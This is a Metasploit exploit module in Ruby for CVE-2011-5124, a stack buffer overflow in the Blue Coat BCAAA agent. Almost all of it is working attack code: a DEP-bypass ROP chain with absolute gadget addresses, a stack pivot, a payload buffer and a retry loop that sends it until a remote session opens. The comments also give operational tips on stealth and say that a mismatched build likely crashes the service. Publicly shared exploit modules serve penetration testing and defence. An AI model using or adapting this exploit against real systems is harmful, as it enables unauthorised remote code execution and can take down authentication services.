GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/bcaaa_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
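# Exploit module for CVE-2011-5124: a stack buffer overflow in the Blue Coat
# Authentication and Authorization Agent (bcaaa-130.exe, TCP/16102).
#
# The module sends a single crafted TCP message built from a hard-coded ROP
# chain (VirtualProtect-based DEP bypass) plus a stack-pivot chain, then
# retries the whole send up to ATTEMPTS times until a session comes back.
#
# Operational caveats a tester should be aware of:
#   * Every gadget address below is an absolute pointer into MSVCR71.dll,
#     MSVCP71.dll, MSVCR70.dll and SmAgentAPI.dll as shipped with the single
#     listed target (5.4.6.1.54128). There is no version fingerprinting, so
#     against any other build the chain will not line up; the likely outcome
#     is a crash of the agent (an availability hit on proxy authentication)
#     rather than a session -- confirm the build before running this in
#     production. (The crash outcome is an inference, not something this
#     module observes.)
#   * Each attempt ships the full payload, so the retry loop multiplies the
#     network noise; lower ATTEMPTS if stealth matters more than reliability.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata, the payload constraints and the user options.
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",
      'Description'    => %q{
          This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),
        which comes as part of the Blue Coat Authentication proxy.  Please note that by default,
        this exploit will attempt up to three times in order to successfully gain remote code
        execution (in some cases, it takes as many as five times).  This can cause your activity
        to look even more suspicious.  To modify the number of exploit attempts, set the
        ATTEMPTS option.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Paul Harrington',  # Initial discovery and PoC
          'Travis Warren',    # MSF Module with Universal DEP/ASLR bypass
          'sinn3r',           # More testing / reliability, plus minor changes
        ],
      'References'     =>
        [
          [ 'CVE', '2011-5124' ],
          [ 'OSVDB', '72095'],
          [ 'URL', 'https://kb.bluecoat.com/index?page=content&id=SA55' ],
          [ 'URL', 'https://seclists.org/bugtraq/2011/Jul/44' ]
        ],
      'Payload'        =>
        {
          # Payload slot sits between the ROP chain and the 'EBAB' tag; only NUL is
          # excluded, and the stack adjustment moves ESP clear of the chain.
          'Space'           => 936,
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # The only supported build: every gadget address below is specific to it.
          [ 'BCAAA Version 5.4.6.1.54128', {} ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-04-04',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(16102),
        OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]),
      ])
  end

  # Returns a random 32-bit integer used as don't-care filler for registers the
  # ROP gadgets pop but never rely on. Endianness of the unpack is irrelevant
  # because the value is random anyway; the chain is re-packed with "V*".
  # @return [Integer] an unsigned 32-bit value
  def junk
    rand_text(4).unpack('L').first
  end

  # Builds the overflow buffer and sends it up to ATTEMPTS times.
  #
  # Buffer layout (all fixed-position; nothing here is derived from the target):
  #   rand(8) | rop_gadgets | payload.encoded | 'EBAB' | rand(8) | pivot
  #
  # The ROP chain is computed once before the loop, so the random filler words
  # inside it are the same on every attempt; only the two 8-byte prefixes vary.
  # @raise [Msf::Exploit::Failed] via fail_with when ATTEMPTS is not a positive count
  def exploit
    attempts = datastore['ATTEMPTS']
    # A zero or negative count would loop zero times and silently do nothing.
    fail_with(Failure::BadConfig, 'ATTEMPTS must be at least 1') if attempts.nil? || attempts < 1

    # VirtualProtect-based DEP bypass. All addresses are absolute pointers into
    # the target's non-relocated CRT DLLs -- see the class comment.
    rop_gadgets = [
      # rop chain generated with mona.py
      0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
      0x7c37a140, # Make EAX readable
      0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
      junk,       # EBP (filler)
      0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
      0x7c37a140, # <- *&VirtualProtect()
      0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
      0x7c346c0b, # Slide, so next gadget would write to correct stack location
      0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
      junk,       # EDI (filler)
      junk,       # will be patched at runtime (VP), then picked up into ESI
      junk,       # EBX (filler)
      0x7c376402, # POP EBP # RETN (msvcr71.dll)
      0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll)
      0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
      0xfffffdff, # size 0x00000201 -> ebx, modify if needed
      0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
      0x7c354901, # POP EBX # RETN (MSVCR71.dll)
      0xffffffff, # pop value into ebx
      0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
      0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
      0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
      0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
      0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
      0x7c34b8d8, # ROP NOP (-> edi)
      0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
      0xffffffc0, # value to negate, target value : 0x00000040, target: edx
      0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
      0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
      0x90909090, # NOPS (-> eax)
      0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
    ].pack("V*")

    # Stack pivot that lands execution in rop_gadgets; same version-locked
    # address caveat applies (note the SmAgentAPI.dll and MSVCR70.dll gadgets).
    pivot = [
      0x7C3410C4, # RETN (MSVCR71.dll)
      0x1003800C, # PUSH ESP; POP EBX; POP EBP; RETN (SmAgentAPI.dll)
      0x4241467D, # EBP
      0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
      0x7C3417D2, # SUB EAX,EAX; RETN (MSVCR71.dll)
      0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
      0x7C34f6C2, # MOV EAX, EBX; POP EBX; RETN (MSVCR71.dll)
      junk,       # EBX
      0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
      0x5D02D0A0, # SUB EBP,EAX; RETN (MSVCR70.dll)
      0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
      0x7C3B5080, # XCHG EAX,ESP; RETN (MSVCP71.dll)
    ].pack("V*")

    # Sometimes a few attempts are needed to get a shell back (3 or 5 times)
    attempts.times do |i|
      # Stop as soon as an earlier attempt has produced a session.
      break if session_created?

      buffer  = rand_text(8)
      buffer << rop_gadgets
      buffer << payload.encoded
      buffer << 'EBAB'
      buffer << rand_text(8)
      buffer << pivot

      connect
      begin
        print_status("Sending request to #{rhost}. Attempt ##{i + 1}...")
        sock.put(buffer)
        handler
        # Give a connect-back a moment to arrive before the socket is torn down.
        select(nil, nil, nil, 2)
      ensure
        # Always release the socket, even if the send raised, so a failed attempt
        # does not leave a dangling connection behind for the next iteration.
        disconnect
      end
    end
  end
end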